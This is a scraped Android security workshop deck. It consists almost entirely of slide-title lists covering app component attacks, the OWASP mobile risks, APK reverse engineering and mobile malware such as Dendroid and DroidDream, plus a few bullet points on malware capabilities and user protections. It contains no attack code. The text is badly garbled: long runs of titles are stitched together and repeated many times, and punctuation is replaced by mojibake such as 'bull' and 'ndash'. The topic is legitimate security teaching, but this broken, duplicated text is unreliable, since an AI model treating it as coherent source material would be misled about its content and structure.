- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk about…
- Before we start… the threat model
- M2 - Insecure data storage
- Insecure data storage – what it is
- Insecure data storage – what to look for
- Insecure data storage – how to find
- Insecure data storage - demo
- Insecure data storage – real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection – what it is
- What do you mean "incorrectly"
- Certificate inspection in web applications – chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage – what it is
- Unintended data leakage – common leakage points
- Unintended data leakage – how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication – what is it
- Poor Authorization and Authentication – how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication – real example
- And always remember to…
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography – what it is
- Broken Cryptography – how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography – real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection – what it is
- Client side injection – what to inject
- A new Android's toy – the Intents
- Client side injection – how to find
- Client side injection – real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling – what it is
- Improper session handling – how to find
- Improper session handling – few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering & Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling – Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 – Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
MALWARE
Malware Statistics 1
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware Statistics 1
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK: how it works
- Android Application Security
- Android 6.0
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when needed
- Core security features to build secure application
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk about…
- Before we start… the threat model
- M2 - Insecure data storage
- Insecure data storage – what it is
- Insecure data storage – what to look for
- Insecure data storage – how to find
- Insecure data storage - demo
- Insecure data storage – real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection – what it is
- What do you mean „incorrectly"
- Certificate inspection in web applications – chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection - how to find
- Insufficient transport layer protection - example
- Insufficient transport layer protection - few facts from reality
- Insufficient transport layer protection - mitigations
- M4 - Unintended data leakage
- Unintended data leakage – what it is
- Unintended data leakage – common leakage points
- Unintended data leakage – how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication – what is it
- Poor Authorization and Authentication – how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication – real example
- And always remember to…
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography – what it is
- Broken Cryptography – how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography – real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection – what it is
- Client side injection – what to inject
- A new Android's toy – the Intents
- Client side injection – how to find
- Client side injection – real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling – what it is
- Improper session handling – how to find
- Improper session handling – few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering & Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling - Dex2Jar
- Decompiling – Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet - malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 1.1
- DroidDream example 2 – Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
